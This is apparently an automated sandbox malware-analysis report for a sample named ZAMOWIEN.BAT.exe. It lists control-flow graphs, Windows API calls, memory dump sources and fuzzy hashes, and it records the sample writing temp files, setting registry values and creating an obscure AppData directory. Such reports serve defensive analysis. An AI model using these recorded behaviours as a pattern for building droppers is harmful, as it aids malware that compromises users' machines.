757->739 759 40326a-40326d 757->759 758->720 759->756
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountTick$wsprintf
                                                                                  • String ID: ... %d%%
                                                                                  • API String ID: 551687249-2449383134
                                                                                  • Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                                  • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                                                  • Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                                  • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 760 4057bb-405806 CreateDirectoryW 761 405808-40580a 760->761 762 40580c-405819 GetLastError 760->762 763 405833-405835 761->763 762->763 764 40581b-40582f SetFileSecurityW 762->764 764->761 765 405831 GetLastError 764->765 765->763
                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                                                  • GetLastError.KERNEL32 ref: 00405812
                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                                                  • GetLastError.KERNEL32 ref: 00405831
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                  • String ID: C:\Users\user\Desktop
                                                                                  • API String ID: 3449924974-3370423016
                                                                                  • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                  • Instruction ID: bfe53add753044f5513d0e7cef191a671c10544bda2f5855e72e4bfb682ac43c
                                                                                  • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                  • Instruction Fuzzy Hash: 14011A72D00619DADF009FA4C9447EFBBB4EF14355F00843AD945B6281DB789658CFE9

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 766 405da9-405db5 767 405db6-405dea GetTickCount GetTempFileNameW 766->767 768 405df9-405dfb 767->768 769 405dec-405dee 767->769 771 405df3-405df6 768->771 769->767 770 405df0 769->770 770->771
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 00405DC7
                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3), ref: 00405DE2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountFileNameTempTick
                                                                                  • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                  • API String ID: 1716503409-1791540020
                                                                                  • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                  • Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
                                                                                  • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                  • Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 772 7050177b-705017ba call 70501b63 776 705017c0-705017c4 772->776 777 705018da-705018dc 772->777 778 705017c6-705017cc call 70502356 776->778 779 705017cd-705017da call 70502398 776->779 778->779 784 7050180a-70501811 779->784 785 705017dc-705017e1 779->785 786 70501831-70501835 784->786 787 70501813-7050182f call 7050256d call 705015b4 call 70501272 GlobalFree 784->787 788 705017e3-705017e4 785->788 789 705017fc-705017ff 785->789 794 70501882-70501888 call 7050256d 786->794 795 70501837-70501880 call 705015c6 call 7050256d 786->795 812 70501889-7050188d 787->812 792 705017e6-705017e7 788->792 793 705017ec-705017ed call 70502a74 788->793 789->784 790 70501801-70501802 call 70502d2f 789->790 804 70501807 790->804 800 705017f4-705017fa call 70502728 792->800 801 705017e9-705017ea 792->801 807 705017f2 793->807 794->812 795->812 811 70501809 800->811 801->784 801->793 804->811 807->804 811->784 815 705018ca-705018d1 812->815 816 7050188f-7050189d call 70502530 812->816 815->777 818 705018d3-705018d4 GlobalFree 815->818 822 705018b5-705018bc 816->822 823 7050189f-705018a2 816->823 818->777 822->815 825 705018be-705018c9 call 7050153d 822->825 823->822 824 705018a4-705018ac 823->824 824->822 827 705018ae-705018af FreeLibrary 824->827 825->815 827->822
                                                                                  APIs
                                                                                    • Part of subcall function 70501B63: GlobalFree.KERNEL32(?), ref: 70501DB6
                                                                                    • Part of subcall function 70501B63: GlobalFree.KERNEL32(?), ref: 70501DBB
                                                                                    • Part of subcall function 70501B63: GlobalFree.KERNEL32(?), ref: 70501DC0
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 70501829
                                                                                  • FreeLibrary.KERNEL32(?), ref: 705018AF
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 705018D4
                                                                                    • Part of subcall function 70502356: GlobalAlloc.KERNEL32(00000040,?), ref: 70502387
                                                                                    • Part of subcall function 70502728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,705017FA,00000000), ref: 705027F8
                                                                                    • Part of subcall function 705015C6: lstrcpyW.KERNEL32(?,70504020,00000000,705015C3,?,00000000,70501753,00000000), ref: 705015DC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1791698881-3916222277
                                                                                  • Opcode ID: b3ea6eb8666f26727dab41e3d320a901aa31b652a5a054e8b7e89d81ffa9a405
                                                                                  • Instruction ID: cec8cb3bf8b4615d6c190ec4f8d625bebedd6bd87c671df0f6541c3aeaa59456
                                                                                  • Opcode Fuzzy Hash: b3ea6eb8666f26727dab41e3d320a901aa31b652a5a054e8b7e89d81ffa9a405
                                                                                  • Instruction Fuzzy Hash: 9341C6724003049ACB059F70DD89B9E3FBCBF44310F108569F9479E286EBB89544CB6A
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseValuelstrlen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp
                                                                                  • API String ID: 2655323295-2099554144
                                                                                  • Opcode ID: ff438228ff69c0b1b81607afcdffde54d041ccdc3207ec43477f834cf4197262
                                                                                  • Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
                                                                                  • Opcode Fuzzy Hash: ff438228ff69c0b1b81607afcdffde54d041ccdc3207ec43477f834cf4197262
                                                                                  • Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68
                                                                                  APIs
                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,764A3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405C12
                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                    • Part of subcall function 004057BB: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,?,00000000,000000F0), ref: 0040164D
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness, xrefs: 00401640
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness
                                                                                  • API String ID: 1892508949-3308940007
                                                                                  • Opcode ID: 58aa6ed634d69523fe253ba31863865a35b3a84d19f8a0e45168ecad015ca2ca
                                                                                  • Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
                                                                                  • Opcode Fuzzy Hash: 58aa6ed634d69523fe253ba31863865a35b3a84d19f8a0e45168ecad015ca2ca
                                                                                  • Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                  • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                                                                  • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                  • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                  • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
                                                                                  • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                  • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                  • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                                                                  • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                  • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                  • Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
                                                                                  • Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                  • Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                  • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                                                                  • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                  • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                  • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                                                                  • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                  • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                                  • Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
                                                                                  • Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
